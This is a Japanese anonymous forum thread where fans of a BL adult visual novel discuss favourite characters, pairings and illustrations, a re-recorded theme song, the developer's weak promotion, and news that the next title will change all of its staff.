ワイシャツ+ネクタイ+白衣できっちりした格好の武岡エロも見たい…と心底思った 髪も適当でいいから後ろに撫で付けてな…
受け真田も攻め真田も大興奮だろうねw 壱をクリアしてきた
全体的に萌えたけど最後のスチルなんだあれ('A`)モー
でも好き >>262
「画面のおかしさに気づいた奴の目をつぶry」
:(;゙゚'ω゚'): たしかにあの絵、ちとおかしいんだけども、イチの顔が可愛いので帳消しになる あの絵は真田が問題解くのに「え〜と・・・」ってな感じで
手首をちょい曲げて考え込んでる絵なんだろうと自分は思ってた
でも、おまいそんな姿勢じゃ目が悪くなっぞと
背中に定規を突っ込みたくはなったなw エンタメ作品でパーツだ構図だにリアル追求しちゃアカンって聞(ry
自分は気にせんかったよ。
萌えるじゃん。向かい合わせで勉強ってw だって手首と指が目に飛び込んでくるんだもん(´;ω;`)
目を潰される!w 自分はイチの顔が飛び込んでくるw
イチかわいいよイチ 聴けない自分に臨海について話していたか教えてほしい 聞いてきた。特に話題になってなかったよ
しかしどの層をターゲットにしてるのかよくわからんラジオだ >>271
そっかーありがとう
FDを今か今かと待ってるんだぜ公式イイイイ BLの方向に話の流れが行きそうなところ、さりげなく軌道修正してるところが
上の人から何か言われたのかなぁと思ってしまった
でも確かにあの内容だと、どの層をターゲットにしてるのかよくわからんね
BLの濃い話題を、しかも女性声優交えてってのは他にないから
むしろ前回のまま突っ走っていった方が、
オタの固定リスナーをつかめそうな気がする
それにしても霧原の中の人、何かホントにBLやりたそうだよね
こういうやる気満々な人起用して欲しいな
ネタなドラマCDでもいいから、
あの洞窟のあたりで何か乗り移ってみたいな感じで
黒キャラ化した霧原とか聞いてみたいな
原画さんとライターさんのHPに拍手ができてた。
マメにお返事してくれてるみたい。
なんかファンとの交流の場を設けてくれたみたいで嬉しいな。 そろそろ修業の季節、か…
しつこいようだが第三作「紅葉狩り」及び「スキー教室」期待してるんだぜ >>274
ポチポチしてきた!
何書けばいいか分からなくてコメは入れなかったけど 紅葉狩りで合宿は普通の学校じゃ行かないとオモ(´・ω・`)普通の設定の上に乗っかれないよ……
しかしスキー教室(・∀・)b 紅葉狩りはFD収録で短編その後!スキー教室は第三作!これでどうだ!ww やっと臨海手に入れたのにインストール中にエラー…orz
vistaの自分が憎いいいいいいいいいい(´;ω;`)ブワッ >>282
誘い受けは公式隅々まで見るか、せめてこのスレ全部読んでからにして >>282は悲しみを表現する方向が過度 (太田)
>>283はツンデレ (真柴) 某ラジオで臨海の宣伝またしてたよ
中の人が頑張ってるんだから公式ももうちょっと頑張ってくれてもいいと思うんだがなー この間ちょっと頑張ったじゃんw
してくれない!してくれない!って騒ぐより、また作戦会議でもしよーぜww BPの拍手レスで 「ファンブックは公式様にお願いしてください」って
あるけどBBSに書き込むよりはメールのほうが効果あるのだろうか?
それともどっちにも特攻すべき? そしていつの間にかメインテーマの歌をブツブツ歌っていることに気がつき悄然 でっでっで、でっでっで
ちゃららら、ちゃっちゃー
が頭の中で回る 初プレイ、かわいかったおもしろかったーー!
次回作楽しみだー 修行旅行を今更だがプレイ
春木先生がツボすぎる・・・が
全体的に声が気に入らなかったのは自分だけか?
南部の声だけは好きだが
主人公が修業とかぶる気がするんだが
今から臨海プレイする俺にお前らのオススメのカップリング教えれ 声は好き好きだからな〜
自分は修業も臨海も声は平気だった
個人的にオススメは壱(受け攻めどっちでも)だが
とりあえず全員やって来い、話はそれからだ こどもの声だけは、修行も臨海もないと思ったわ…('A`) >>296
アニメとかだと子供(時代)は他キャラの女性声優がやったりしてるからね。
男声優ばかりのボブゲではどうしようもない。
わざわざ雇う金ももったいないだろうし。
自分はむしろ中の人が無理して頑張ってる・・・と切ない気分になった。 セリフの多い修業は無理だが、
臨海くらいだったら女性スタッフで一番上手な人が
やってみたらどうだろうかと思った 「あのなぁー、おれなぁー」ってあの声は確かにちょっと引いたわ…
子どもっていうより馬鹿っぽく聞こえた。
別に声優さんに妙な裏声だせとは言わないけど、さw 最近はまったんだけど、公式で動きとか無さそうで寂しい 知ってるか・・・あれってもう三ヶ月近く前なんだぜ・・・?
年を取ると時間の感覚が早くなっていけない 3ヶ月前のかw
じゃあ半年に一回くらい更新期待しとけばいいかー そうだなあ、最近はまったとかだと「公式に動きがない!寂しい!」っていう急流に身を置いてる感じだけど
だんだん「半年に一回でも( ´∀`)アハー」っていうまったりな流れに絡みとられてくると思うよw
中の人はやれば(更新)できる子 そんなことないといいね
でも差し入れはしたい気持ちさ
サンドイッチ つ じゃあチーズつ□
朝食の残りをポケットに入れておきました 次回作発表はまだですか?
社員全員で出稼ぎ中ですか
そうですか 宇佐見は何をしても違和感を感じないと思えるところが凄い。
突然踊りだされても宇佐見だからで納得できるもんね 原画さん夏に出るらしいけど
修業本の臨海バージョンとかは作らないのだろうか…
公式が動きが無い今…なにか…何か餌が欲しい 夏だな!
暑くなってきたしそろそろ再プレイするかなww 夏だし、まだ攻略してなかったキャラがいたので一昨日くらいから再プレイ中。
けど、全クリするのが勿体無くて… 遅ればせながら臨海買いましたー
地元の兄に在庫無くてメーカーに取り寄せてもらったのですが、
メーカーの中の人はまだ生きているってことでよいのでしょうかね??
とりあえずこれから攻略するぞー楽しみだー >>328
ようこそ友よ!
楽しい合宿を満喫してください。
328です。現在真柴攻略中…早くAV喘ぎが聞きたいいいい
ところでここでネタバレ質問はしても良いのかな? 語り合いたいのはわかるが、まず目の前の箱で攻略とかネタバレ、調べられないのかな? >>331
真柴乙
>>330
一応>>2にバレスレがあるけど、あんまり人いないかもね。
とりあえずあっちを読んでわからないようなら、あっちに一旦投下してみたら?
ここ見てる人あちらでよろしくということで
ここは>330専用の痒いところに手が届く!攻略指南所じゃないからなあ……
装甲車で乗り付けてくれたら質問を受け付けてあげよ(略 >>323
餌ほしいよね…
新婚さんの会社みたいな姿勢だったら
真柴のイラスト描いて送りまくるのになw シロウトが似せて描いた絵とか募集して、サイトの見えるところに飾るような会社だったら見限る (´;ω;`)馬鹿ー!空気がないと死んじゃうんだぞ!
第一変換 信者生んだぞ >>335
しかるべき雑誌にでも送りまくればいいじゃん >>331
>>341
真柴かわいいよ真柴
このスレでどんなツンレス見つけても
微笑ましくなってしまうわい どうでもいい話だが、
臨海はディスクレス可だったんだな
今の今まで気付かずにいちいちROMを放り込んでたよ… 今臨海合宿やってるんだが、真田がほどよくガキ臭く、ほどよく男らしくていいな
「おまえのこと、オレが、貰うからな!」とか男らしすぎて悶えたよ
あと宇佐見がヘンタイ臭くていいwww親子ドンブリ発言には糞ワロタwww _, ._
( ・ω・) ンモー
○={=}〇,
|:::::::::\, ', ´
、、、、し 、、、(((.@)wwwwwwwww>>347wwwwwwwwwwwww あー公式に動きがないと寂しいねぇ
この臨海メンバーもいつか修業旅行に行くわけだよな・・・ 順当にスキー合宿もいいけどな
2001年冬発売希望・・・
いっそ社会人にして新人研修とかって手もあるよな
先生ポジションは研修担当の先輩あたりで
で、会社の不正とかをいきなり暴いて皆で職なしになるんだ!
・・・餌がないと変な方向にいくな
修業から再プレイしてくるわ・・・・・・・・・ 本当だ・・・orz
ごめん平成21年と混じったorz
吊ってくるorz やっぱり学生がいいよ・・・
林間か修業旅行で九州へ!でも台風上陸で急遽行き先を
変更する事に・・・。困った学校側は手抜きで臨海合宿で行った
あの町をセレクト・・・・。
とでもしなきゃ武岡が出て来られないw 文化祭で学校泊り込みして欲しい
修業臨海で不足がちだった校舎分を補給したい 公式にお願いしなさいって
ここで妄想並べられても困る 過疎板だし別によくね?スレチなわけでもないし。
困るんなら見なきゃいいのに・・・。 ここに公式様とか書いても公式様が見てるわけない、チラ裏に書けばいいんだよ。
あと妄想はスレチ。 ■以下は該当板へ
【女向ゲーム一般】:全年齢乙女・BLゲーム
【PINKちゃんねる】:非BLゲームのやおいネタ、男性向エロゲー等 ※21歳未満立ち入り禁止
【同人コミケ板】:ゲームを離れた二次創作・二次妄想・非オリジナル同人ゲーム
【キャラネタ板】:ゲームキャラのなりきりなど
【ネットwatch板】:スレ、ファンサイト等ウォッチ
※他の当板にあてはまらないゲームは各ゲーム板へ 自治厨が粘ってるのも公式が燃料投下してくれたら
解消されるのだろうか・・・。 餌クレもここでやるなも自治厨キター!も全部漏れの自演ですから お前みたいなのが自演なんて出来るわけないだろ、馬鹿! ったく、自分1人で全部出来るわけないだろ、このバカ! そこで冷静になったら真柴じゃない!ヽ( `Д´)ノ┌┛ガッΣ(ノ`Д´)ノ >>365>>366はケコーンしろw
しかしこのスレ、過疎っているようで人来てるんだね。
流れを豚切って臨海の話
みんなは、好きなスチルとかある?
私は臨海の大型犬×ナオの、海辺でしゃがんでるやつ
ナオの座り片が禿げあがるほど可愛くて好きだw 自分もそのスチル好き。綺麗だよね。
あとは合宿の思い出3P目の上段真ん中のスチル、ナオの表情がセクシーでたまりません。
スチルではないけど、ポニテのイチの立ち絵が凄く好きだ。 イチの肩の上に立ってパンチラ直たんに萌えた。
あの場面はイチの反応もかわいいしwシナリオだけでも
充分萌えだが、スチルがあって嬉しかったよ
あとはきっと姐さん方も好きだろうお風呂シーンのスチル。
霧原がちゃっかり一緒なのもナイスだ 親子丼END追加のFDはまだですか?w
宇佐見サブなのにキャラ立ち過ぎwルネ山GJ!
いまだにグロな立ち絵が頭から離れない〜
リアルさからは遠いのになぜか目に焼き付いてるよ
太田のスチル、上下で差がありすぎてつい笑ってしまうw
元々男性向け描いてる絵師だけに太田女装絵可愛いな 親子丼って宇佐見→武岡→直タンだろうか・・・
宇佐見×直登が見てみたいよ みんな好きだけど、特に霧原が好きだ
拉致監禁しちゃいたい〜のくだりとか、ベタだけど携帯で「好きだよ」のメールとか思わず床ローリングした
かわいさでは武岡のオサーン受けだったがw >>374
霧原いいよねぇ
霧原×直登に萌えまくったよ
真柴も大好きだけどあんまり人気ないのかな?
この子のおかげでツンデレ攻めに目覚めた
あーーFDで後日談とか見たいよーーー 真柴好きだよ真柴
真っ先に攻略したよw
ツンツンツンツンされまくって、本当にデレてくれるのか(エチーに持ち込めるのか)心配だったw >>375、376見て久々に最凶ツンデレ様拝んできた
真柴攻めの回想見たけど、ちっともデレてねぇww
そこがまた萌えるんだけどw
「既成事実」と「長くもたない」発言はネ申セリフ。 新作ktkr
ttp://www.cool-b.jp/new.html なんだよガセかよと斜め読みしたのを
もう一回最初から読んでいったら……ああああぁぁああぁぁ
本当なのか!?本当なのかー!? 嘘でもいい…
何らかの音沙汰があるならもうそれだけでいい…
さーて今から貯金始めるか 完全新作か、臨海のFDとか派生モノか・・・
とにかくwktkwktk それでもいい
臨海メンバーで修業旅行とかでもいい
たまたま雪成に会いに来ていた従兄弟ご一行と
鉢合わせてもいい
男の子たちがツルんできゃわきゃわ騒いでるならもう何でも良い
エロ&ラブ度だけはアップしてくれ
FD欲しい!
メラ星さまお願いぃ〜〜〜
親子丼はどうでもいいけど宇佐見を攻略したいよ
みんなに朗報
今月号の冷微の付属ディスクに真田と霧原verの臨海合宿主題歌が入ってます う、嬉……う、う〜ん!?
主題歌かぁ…微妙な嬉しさだ ちょっと動いただけでもありがたやありがたや・・・
真田と霧原verって、2人でデュエット?それとも別々に歌ってるのか?
もしくは歌詞が真霧真っぽくなってるとか?
まぁ何でもいいけど、いるかいらないかと言ったら・・・ >>390
手元にあるがまだ聴いてないw
クレジットは「真田&霧原ver」になってるからデュエットだろうと思われ
多分歌詞は変わってないと思うよ 歌……か……(´・ω・`)んー、声優スキーじゃないからちょっと微妙な感じかも。
さあ、聴いてみて感想を教えておくれよ 手、手元にあるということは冷微もあるんかっ
新作情報どうなってました? 387ではないが
新作情報は、出そうというだけで内容は未定
売り上げが芳しくなかったので続編ではない別のもの(ファンタジーとか、学園モノでも全然違うやつ)
出るのはたぶん2010頃
個人的にはこの情報はちょっと……って感じだった >>393
冷微レポで長文いきます
えーとだな、プロデューサーから「次やろうか」という話は出てるらしいが、
臨海の業績がウヘァだったために「続編を出します!」とは断言出来ないそうだ
今までの経験を踏まえて、じっくり腰を据えて企画を練って慎重に進めていきます、と締めてます
とりあえず現時点でアイデアとして浮上している構想はいくつかあるようで、
1つ目はファンタジーモノで、4人の主人公それぞれの視点から物語が展開していくそうだ
キャラのテーマカラーと性格も考えているそうで、緑髪の奴は嫉妬深くて二重人格、といった風になってるらしい(あくまでアイデア段階)
2つ目は歴史モノで、武将や忍びの者が大活躍するそうだ(あくまでアイデア段(ry
3つ目・・・というか、もし出すならアイドル養成学校はどうかなとも言っているが、
決定しているタイトルが『聖・モロコシ学園』というのはいかがなものかwww(あくまでア(ry
4つ目が「男子ペアフィギュアモノ」。男の子同士が手を取り合って銀盤の上を華麗に舞うそうだw
あとここ重要。次回作では 原 画 ・ シ ナ リ オ を 含 め 、 ス タ ッ フ 構 成 全 部 が 変 更 さ れ る そうだ
つまり、金目鯛&B太コンビのb-pink作品は臨海が最後だったというわけだorz
・・・でもって、みんなが気になってしょうがない(?)真田と霧原のデュエット主題歌の出来だが、
安心しろ、自分が想像してたよりは良質だったぞ。少なくとも聴くに堪えんというものではなかった
歌唱力は霧原の方が若干上かな?ただ霧原の声は素の状態で耳障りがいいんで、声色に助けられてる部分もある気がしたw おおっと、長々書いているうちに先を越されてしまったようだw ('A`)ウヘェアだったのか…よかったけどなー、臨海。
モロコシ学園てちょっとwwww
>>397姐さんもレポまりがd 臨海はなー、話は結構面白かったんだけどなー
楽しみの一つであるCGの質が、3年も前に出たはずの修業以下だったってところが痛かった
今度出してくれるなら是非ともCGにはチェックをしまくって頂きたいw >397
ありがとうございました
コンビどころか金目鯛さんでもB太さんでも無いということになりそうだ
・・・え? 臨海を勧めにくいのは「シナリオの流れ・システムが修業と一緒だから」なのに
同じスタッフで原画とライター変えたらメーカーいいとこ無しやん・・・
臨海を勧めにくい一番の理由はやっぱ「スチルが('A`)」だろぃw
キャラは好きだしせっかくの萌えシチュエーションなのにこの絵は無いだろってのが多々あったぜ・・・orz 見たかったのは修業コンビの新作またはFDだったんだけど…
ブランド名そこからつけたんじゃないの? >>403
>>397
>原 画 ・ シ ナ リ オ を 含 め 、『 ス タ ッ フ 構 成 全 部 』が 変 更 次回作、あのコンビじゃないのか……orz
なんか凄いショックだ。
まあ気を取り直して、>>397の構想なら歴史かフィギュアものがいいなー
一般受けするかはわからんけど。
あと、次はあのデカイ箱じゃなくて普通のケースにして欲しい。 なんだかその企画の数々、すごくマリソ臭がします
まあマリンくらい開き直ったゲームも面白いと思うけれど
ただしライターさんはいい人見つけてきてねw 原画とシナリオどちらかでも変わるのなら自分にとっては別ブランドのようなものだ。
いろんな意見の人がいるだろうけど、自分はこの2人でまた作って欲しいよ。
次次回作を考えるほど余裕のあるメーカーじゃないと思うし
首切られたってことじゃないの? >>397
乙です
1で視点は二人くらいで進めていくやつキボン
緑髪の奴は嫉妬深くて二重人格←これは◎
髪の色は黒がいい。黒には血の赤や精○の白が映える
ファンタジーはファンタジーでも本格的な黒いやつをお願い
2〜4はいらん
ゲーム自体はそんなに悪くないのにぱっとしないのは
こいつだけは見とけと人に薦めまくりたくなるような突き抜けたキャラがいないから
思い切ったことをしないと次を作っても売れないと思う
緑髪の奴は嫉妬深くて二重人格←受けだか攻めだか分からないけどこいつに期待
臨海の絵は嫌いじゃなかったけど古すぎる
変えたら間違いなく臨海よりは売れると思う。が、
こればっかりは次の絵師の絵を見てみないとなんともいえない
それに絵師が頑張ってもシナリオがつまらなければ結局売れないからシナリオも大切
なんにしても期待して待ってる この程度で萎えてるようなら次を作ってもまた売れないだろうね 黒いファンタジーならここでやらなくてもよそでやりそうな所があるから
ここは独自路線の方がいいような気がするけどなあ 独自の路線でやってきた結果が業績がウヘァなんじゃないのか? 作品が良いのに売れないのは宣伝下手&サービス精神の欠落のせい。
公式とか見てるとそう思う。あれじゃ同人以下だよ。 そうですね…orz
でも青春ドラマ風なこの路線は好きだったんだ 普通のADVならシナリオライターの得意分野に合わせるのが一番だと思う。
アクションや歴史ものは書いたことない人がやるにはハードル高い。 メーカーさんに提案とか理想を語るのはいいけど、
あからさまに個人の萌えを大量に書き込まれるとちょっと萎える。設定まで考えちゃって(´・ω・`) フィギュアものも取材や勉強が必要だろうしね。
個人的には見てみたいんだけどやっぱ難しいかな・・・ >>416
同感
何にしろスタッフがもっとやる気を出さないと
次で終わるか次を出す前に終わると思う >>397以降からここまで、誰一人として真田&霧原ver主題歌について触れていない件www 予想はしていたけどショックが大きかったんだろ>臨海の業績がウヘァ&スタッフ構成全部変更 むしろ真柴と壱verだったら食いついたかもしれない自分 武岡と真田のデュエットならオートリバースしてたかもしれんw
あ、無論霧原も好きだぞ 何で霧原だったんだろう
歌う姿が一番違和感なさそうなキャラではあるけど 久々にスレ伸びてると思ったら悲しいお知らせorz
あのコンビじゃないならもうこのメーカーに用はないよ・・・
自分はあの絵も個性的でいかにもBLって感じじゃなくて好きだし、
あまり萌えないエロCGもシナリオで萌えたから気にしてなかった・・・
もう男の子らのきゃわきゃわ騒ぎを眺めるゲーは製作されないのかなぁ
いっそメリボ復活とか・・・無理だよな
臨海すごく面白かったと思うんだけどな 最強ツンツンツンデレやウザカワとか
キャラも個性的だしさ
宇佐見の親子丼の野望は夢と潰えるのか・・・
テラカナシス それじゃ続編の「研修旅行」も無しになっちゃったのか・・・orz しょぼーん・・・このスレもこのまま更に過疎っていき
そのうちあぼんするのだろうか・・・ 絵柄が好きで買ってたから、絵柄が変わったら内容も考慮しないでいきなり特攻とかはしなくなるなー…
ただ、パースのおかしい背景画とかは改善の余地あり。15年前のゲームみたい。
ライターさんはもうちょっと、中身を変更することを考慮してくれないとプレイヤーが飽きる。
体言止めが多すぎたり(修行よりむしろ増えてる)、修行をプレイしているとわかってしまう分岐とか
日割り構成が全く同じとか。せっかくストーリー的にはいいもの出してるのにさ。
あと会社の宣伝が悪い。全然世の中に出回ってない。 >>433
シナリオの書き方がウヘァなのは同感
読みやすいっちゃー読みやすいが、クリックしまくらにゃならんので疲れる
しかしひとつだけ、ああいうのは体言止めとは言わない >>433
確かに会社の宣伝は悪かったな
他のメーカーのゲームに比べて圧倒的に宣伝を見る回数が少なかった
冷微に臨海の業績は合格点にやや物足りなかったと書いてあって
半分ぐらいは広報の問題じゃねえのかと突っ込みたくなったよ
あとボリュームと価格が見合ってないとかな なんか、ここではライターさんの文が評判悪いけれども、
個人的には気にもならないし、好きなんだけれどもな……
それはさておき、ここ見て覚悟していたけれども、
今日届いた冷微みてやっぱり悲しかった。
あのコンビじゃなかったら、さすがに次は様子見だよ。
あの二人じゃないのはもったいないと思うけれども、会社決定じゃ仕方ないよね。
売り方が悪いと思う、本当に面白いのに。
自分は鬼畜陵辱ダークな話が好きなエロ厨だけれども、
このシリーズだけは別格でえらい萌えたんだが。
もうこんなゲームが出来ないのは本当に寂しい。
次は林間か、と楽しみにしていたのに…… 評判悪いっていうか、どんどん品著になっていくクセをちょっと削ってほしいっていうかさ。
せっかく引き込まれるストーリー書ける人なのにもったいない。
遠隔地合宿物ばかりで固定しちゃうと、ますます文章のクセとか展開も同じになっちゃうんじゃないかなあ。
同じ学校ものでも、もうちょっと目先を変えてみるとか。 >>437
本当の意味での林間学校か、それとも輪姦の意図的変換なのかどっちだ?w 次が売れたら次の次くらいでコンビ復活してくれるかもしれないし諦めないで待っとく
ツッコミ所は多々あるけどそんなの気にならなくなるくらいには大好きなんだ…
公式でも主題歌配布って書いてあったよね?楽しみ うーん…主題歌って……上のほうで姐さん言ってた新バージョンのかしら?
やっぱなんかこう、微妙に宣伝ポイントを間違ってる気がする……
楽しみには待つけど……うーん >>433
臨海は発表から発売までがわりと短期間だったし
修業より荒めのCGや同タイプの展開・分岐システムなのも
開発期間短縮して費用を抑えるためかなと思ってた
それでもすごく萌えたから、関連商品や次作があるなら
喰い付く気満々だったわけですが
ライター&ゲンガーまで全取っ替え予定とは斜め上の展開でした⊂⌒~⊃。Д。)⊃
興味があるとしても、それはもう全く別の新ブランドへのものだなぁ…orz
部数が読めずファンブック系が難しいなら、DL専売のSS集とかどうでしょう会社の中の人
某ブランドがやってたと思うが、あれの売り上げはどんなもんだったのかな >>441
やっぱり広報の仕方がズレてるよなw
真田と霧原の中の人で主題歌新録するより
ショートドラマでも新録したほうが良かったんじゃないの ドラマじゃなくてサイトにSS載せてくれるだけでも大喜びする 声優に歌わせたって声優萌してる人ぐらいじゃないと
食いつかないんじゃないの?
キャラソンとか全く興味ないから歌われても…って感じ
ファンブック出さないならサイトに没ネタやキャラ原案、ラフでも
出してくれてもいいのに
SSなんて載せてくれたらマジ感涙もの 会社の中の人がアの歌に妙に思い入れがあることはわかった。
オープニングで声ナシで流したり、エンディングでスキップ不可で延々流したり
声優声で採録したり
でもあの歌って、そんなに…いいかなぁ?
ゲームの付録(すまん)としてはまああんなものだと思うけど、昭和の香りが漂ってるよ。
あれにポイントを置いて広報しようというのはやっぱり声優スキーがターゲットにしかならないと思う 昭和歌謡曲は嫌いじゃないので聞いてるうちに癖になっては来たけれど
このゲームの歌だからで延々と聞きたい曲ではないかも
前に中の人が同人を出したみたいに多少高くなってもいいから
メーカで出してくれたらいいのになあと思う
ここはゲームそのものよりも広報の仕方がかなり変だ きかーせてよ今!キーミの歌を!もーーーーとーーーっ!
とは残念ながらならなかった・・・。ほんとボツ話とかボツラフとかでいいからさぁ・・・・ この絵師とライターのコンビはホントに広報に恵まれてないなぁ
メリボん時の広報なんてメリボスレの姐さん方がやってたようなもんだし・・
修業はへぼんや狗に挟まれて地味に発売されたけど
とくにバグもないし会話だけでもすごく面白いし
広報の仕方によってはもっと売れたんじゃないかな
臨海も結局同じような感じになってしまってもったいないよ
ちょっとブログ更新したりラフ画うpするだけでも全然印象違ってくるのに
つか、ユーザーでもわかることがなんでプロにわからな(ry・・・ 雑誌とかで大きく取り上げてもらうのはいろいろと大変だろうけど
公式サイトをもうちょっとまめに更新してくれるだけでいいんだけどな。
ただし今回の歌みたいなものじゃなくあくまでもゲーム内容に
関わったものでね。 公式サイトで購買意欲があがらないのもね…
修業も公式でスルーして
スレの姐さんのレビュー見てあまりに楽しそうだったので買ったよ 本当、ちょっと目を離すと真面目なスレになるところですねここは!
誰か公式にここ推薦してこーいw じゃあw
三白眼ハアハア
学ランハアハア
こうですか! また戦略会議かwww
>>453
入浴と女装と水着が抜けてるぞ ああ、女装要素も前作から踏襲してたのね。
でもセーラー服って、パワーダウンしてないだろうか。
お手軽に変化を演出できるけど、女装って「…。」って人もいるだろうしなあ
なんでイチにはシーツ着せたスチルないの(´・ω・`)誰かが言ってたエセ女神風の 自分は瀬永の舞妓姿が一番好きだったなあ
人力車の上で手握り合うシーンは本当に萌えた
ルート的にも瀬永ルートが一番好きだ。次点で春木
・・・いかん、なんか修業リプレイしたくなってきた 修業やりたくなってきた
↓
修業おもすれーww
↓
臨海ももう一回やりたくなってきた
↓
臨海もおもすれーwwww
↓
以下エンドレス
こうですね、わかります >>459
それやるにはPCに修業と臨海を同時に入れる必要があるが(ヤったら片方消しヤったら片方消しって面倒だから)
同時インスコはPC容量が許してくれねえww >>460
外付けHDD買えば問題なしだ!
自分は臨海のセーラー服も好きだぜ
肩車(というか肩の上に立ってたけど)で直登のパンチラ見てぶったおれるイチの
純情さがいいw
ホント没画集でもなんでもいいから出して欲しい
高くても買うよー
公式全く更新してないけど、社員はBBS見てるのかな? 公式が更新されないのはいつものこと
最近更新があったなんて思っていると三ヶ月も経っているから困る このメーカーって絵師さんとシナリオさんが立ち上げたのかと
思ってたぜ 前のメーカーもそうじゃなかったのか?
このコンビにはまたボブゲ作って欲しいが、新ブランドに行く→1作出す→販売努力を
せずに売り上げ伸び悩む→ブランド冬眠(永眠?)の流れは次で断ち切ってくれ
このコンビの作品好きなだけに切な過ぎる 修業コンビは自分たちで同人で出した方が小遣い稼げそう
たとえ声なし音楽背景フリーでも
中身が3番煎じでも買う人は買うだろうし そんなん出たら買う、けど…ホイホイ外野の声に乗せられて、軽率な行動に走らないようにお願いしたい なんでいつも放置しちゃうんだろうな
もったいない
SSとか壁紙出すだけでもモチベーション上がるのにな こんなやる気ないメーカーが描き下ろし壁紙配布なんてやる気に満ちたサービスやるかよ
ゲームはそこそこ面白かったが、売ったら売りっぱなしでファンサービスのカケラもないってのはどうかと思うんだぜ 商売っ気が無さ過ぎて残念だよホント・・・
燃料投下も無いから、発売直後に結構あった虹サイトも
臨海コンテンツ更新してるところ少なくなったしね
このまま過去の作品として埋もれていくのかと思うと切ないなぁ
>>472
まー、でも過剰なファンサービスの期待もだめだよね
もっと続き続き!おまけおまけ!ってエスカレートしていく変な人もいるわけだし
ここはもうちょっと公式が動いてくれてもいいがな! ちょっとどころじゃ足りん
むしろこのメーカーは少し過剰なくらいで行った方がいいんじゃないのか アレな方向のままやりすぎて滑ったら目も当てられない
ファンの歌う主題歌・天下一決定戦なんてやられても過剰な上に困るじゃん 修業の時やったみたいな初詣ドラマみたいなのをひとつでもやってくれたら嬉しいのにな
それが無理なら各カップリングでSS公開してくれるだけでも十分ありがたいのに SS集や設定資料集とか出してくれたら
たとえ挿絵がゲームスチルの使いまわしでも喜んで買うけどな
商売センス無いっぽいから、うっかりやる気出すと>>476みたいな企画を
生み出す可能性は充分にあると思うよw 冷微についてた主題歌聞いたよ
真田のなかの人の超歌唱力っぷりに吹いたwwwwwwでも癖になってきたかもwww しまった、そんなこと聞くと買いに行きたくなる…(´・ω・`)ネタ大好きな体質なんとかならんのか自分 なんつーか二人ともかわいい歌唱力だったよw
始めからある意味隙がなくてちょっとびっくりするよwww あぁぁ 冷微の記事を見ても、まだ諦め切れない自分・・・ 主題歌といえば、今頃臨海やってるんだけど
これED飛ばせない仕様?
1周目だけかと思ったら何周やっても飛ばせないw 新作予定キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
まじ楽しみ 公式で告知されると雑誌のインタビューで
形式的に答えてたものを見るだけより現実味あるね
3年毎がスランスらしいからなかなか遠い話だが こんな告知だけでこんなに嬉しいなんて・・・
次回策本当に夢見てていいんですね
もう最近このまま自分のBLゲ人生終わるんじゃないかと思ってたから
涙出るほど嬉しいよ 今日臨海買ってきた。武岡の中の人とオサーン受けが大好きなので買ったのだが…
壱…!!!
い ち !!
もってかれた…
そして宇佐見×武岡は何故ないのか…
FDほしいよ−だしてよー
新作予定の流れを豚切ってスマソ。 主題歌真田×霧原バージョンって初めて聞いたけど
これ元歌もメインVoは真田の人?
だとするとあのプッシュ具合も納得>ED仕様 プッシュに関しては、メーカー本体がプッシュする方向を盛大に間違ってるだけだとオモ。 ごめん、自分が大馬鹿だった
ダウンロード場所間違えて通常ロングver.をダウンロードしてたorz
こんな間抜けな質問にちゃんと答えてくれてどうもありがとうござました 一周年記念が主題歌かよw
声オタは嬉しいかもだけど、記念絵やSSの方がよっぽどいいと思うよ・・・
新作っていっても原画&シナリオ違うんだもんなぁ
何か複雑だけどとりあえず情報が出るまでヲチするか 雑誌持ってるけど聞いてなかった真田×霧原バージョン
聞いてみたんだけど…wwwww
良く言えば、二人がカラオケで歌ってるのを横で聞いてる気分になれる
…と言えばいいんだろうかw
新作はなぁ…B太さんたちは今どうしてるんだろう…?
>>495
ご新規さんいらっさーい
壱いいよなー(*´∀`)あの一途っぷりがたまらんww かつて新規としてスレを覗いた時
住人全員?が真面目に企画会議していたのをみてびっくらこいたあのころ ソフトハウスの名前的にB太さんとぴんくさんだと思うけど
ぴんくさんは男性向けゲーでバリバリ描いてる。一番新しい奴は変身ヒロイン物かな
可愛かった もともと男性向け絵師だからね
でもそれについてここであんま書くと板違いの宣伝になるので控えて欲しい 声オタだけど歌には元々興味ないからなぁ
そもそも作品が好きなんであって
キャラやカプが見たいわけだから、歌はあまり
デュエットならある意味カプなのかもしれんがw どうせなら攻略キャラ人数分のデュエットしてくれたらいいのに むしろ宇佐美×真田が見たかったな
個人的に非常に惜しい部分だった >>509
その際は必然的に真田×宇佐美も見られるってことですね?
いいな、変態チックな受け… 脇カプって主人公以外が絡むカプのことかと思ってたよ
修業で先生ルートが一番好きだった自分としては
宇佐美が一番それに近く感じたのでちょっと残念に思っただけ
気分害してしまってすみません
話変えて、新作の正式な告知が早く実現することを祈る >>512
おっさん同士のカプがほしいとか言う書き込みのことじゃないだろうか 脇カプの定義は「主人公が絡まない」「公式にない」辺りかと思うけど
総じて嫌われる傾向にあるのは前者だよね
脇カプはないに越したことないと思うけどなぜか滅亡しないよねw 二次妄想は別板で、っていうローカルルールがこの板にはあるですよ(´・ω・`) 二次妄想はこういうカプ欲しいとかあったらよかったも入るの?
SSやポエムを書き連ねるの禁止ってことだと思っていた >>516が何のことを言ってるのかさっぱりわからん
二次創作=既存の作品やキャラを利用した作品のことなら
そういう話は一切出てないと思うけど
>>517
カプの希望は二次そのものではないだろうけど、過度になるとだめだろうね 自分の萌えは他人のウボァってこともあるしね。
神の速度で書き込む前にちょっとだけ考えましょ。
これがほしいあれがほしいなんていうのもメーカーに言わないと意味ないし
妄想も含めて全部書きたいなら自分でどっか借りたりしてブログかチャットでどうぞ、と。 そろそろ怒濤の毒舌ツッコミを入れようと、真柴がアップを始めました >>522
wktkwktk
最凶ツンデレさま大好きだ
初プレイ時には腹立ちすぎて殺意を覚えたのも、今では良い思い出・・・
こうだったらよかったなぁとかって書くのは単にゲームの感想じゃないかと思う
別に虹や妄想じゃなくね?
自分も宇佐見攻略したかった カプ論議は繊細な問題のようだからね
あのカプも見たかったという意見そのものは二次じゃないけど
公式にないことに対して嫌悪感を抱く人もいるのかも
作中にあったことに対する希望や感想なんかはいいんだろうけど
自分はボブゲに対してはとにかく主人公マンセーなので
主人公を愛してくれるなら誰でもどんと来いだ 宇佐美の立ち位置って(千家兄+高野)÷2って感じで、構成上もろに攻略できない臭満々だったしなあ いくら新作作っても、また臨海と同じような売り込み方するんだったら
売れ行きは臨海と変わらないだろうね
